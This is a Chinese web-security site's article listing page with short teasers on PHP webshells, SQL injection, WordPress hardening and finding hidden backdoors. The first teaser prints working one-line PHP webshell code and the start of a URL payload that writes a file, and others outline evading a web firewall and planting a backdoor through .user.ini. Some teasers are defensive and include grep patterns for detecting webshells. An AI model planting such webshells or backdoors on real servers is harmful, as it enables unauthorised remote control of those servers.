Web安全_服务器之家

服务器之家

专注于服务器技术!
当前位置:首页 > 服务器安全 > Web安全

php一句话和图片方式的木马后门的使用方法

  标准的写法,直接通过eval执行php代码,如下:@eval ($_POST['code']);动态执行assert生成一个木马文件(隐藏性最好的一种)如下:@$_GET['a']($_GET['code']);使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,...

日期:2017-01-11

SQL Injection,SQL注入基础知识解析

  关于 SQL InjectionSQL Injection 就是通过把恶意的 SQL 命令插入到 Web 表单让服务器执行,最终达到欺骗服务器或数据库执行恶意的 SQL 命令。学习 SQL 注入,首先要搭一个靶机环境,我使用的是 OWASP BWA,感兴趣的可以去官网下载一个安装,除了 SQL 注入,很多靶机环境都可以在 BWA 中找到,它专门为 OWASP ZAP 渗透工...

日期:2017-01-11

php.ini中request_order项怎么样设置才安全

   今天刚刚安装dede,安装完成由一条错误信息(PHP 5.3 and above) Please set 'request_order' ini value to include C,G and P (recommended: 'CGP') in php.inidede中给出了解决的方法,把request_order这个配置选项从默认的request_order = "GP"更改为request_order = "CGP"问题解决;关于 request_order...

日期:2016-10-24

13条措施加强wordpress网站安全性

   1.运行最新版本的wordpress 2.运行最新版本的主题和插件3.有选择性地选择插件和主题4.移除数据库中失效的用户5.安全配置-阻止目录列表(网站根目录下的.htacess:Options -Indexes)6.复杂的安全键(AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY,AUTH_SALT, SECURE_AUTH_SALT, LOGGE...

日期:2015-10-18

安全狗特征免杀法过狗Webshell技巧

   因为之前找一个免杀的大马找了很久,昨天就专门研究了下如何做大马的免杀。要免杀,首先就要了解杀手,我们不妨从装个安全狗看看,从中真就能发现一些简单易行的免杀方法。大家注意观察上面两个截图,一个之扫描网马的默认设置,一个是主动防御的默认设置,从中就可以看出两个亮点:1.手动扫描和主动防御都默认...

日期:2015-10-12

Linux系统下查找webshell后门的强大命令

   一句话查找PHP木马 # find ./ -name "*.php" |xargs egrep"phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))"> /tmp/php.txt # grep -r --include=*.php '[^a-z]eval($_POST' . >/tmp/eval.txt # grep -r --include=*.php 'file_put_contents(...

日期:2015-09-17

服务器网站被挂马应该如何检测和清除

   版权声明:原创作品,如需转载,请与作者联系。否则将追究法律责任。 网站挂马检测与清除 陈小兵 据不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如...

日期:2014-11-21

PHP程序中常用的防御sql攻击正则代码

   这篇文章主要介绍了php中常见的sql攻击正则表达式,实例汇总了针对各种常见的SQL语句及正则表达式原理的分析与应用,对于PHP程序设计的安全来说具有很好的参考借鉴价值,需要的朋友可以参考下 本文实例讲述了php中常见的sql攻击正则表达式。分享给大家供大家参考。具体分析如下: 我们都已经知道,在MYSQL 5+中...

日期:2014-11-07

LNMP环境中如何正确的设置指定目录禁止执行PHP程序

   文中提到,使用lnmp1.1搭建的nginx环境,正好我的vps也是lnmp搭建的环境,所以我可以在我的vps里做实验。 看到文中的解决方案: 在location中,将匹配到/(avatar|uploads|ups)/.*.(php|php5)?$的请求全部禁用掉。 似乎是一个很好的方法,那我们怎么绕过? 在we...

日期:2014-11-05

使用PHP的.user.ini配置文件制作后门

  0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IISphp5.3以上的全部用的fastcgi/cgi,我...

日期:2014-11-02
 38    1 2 3 4 下一页 尾页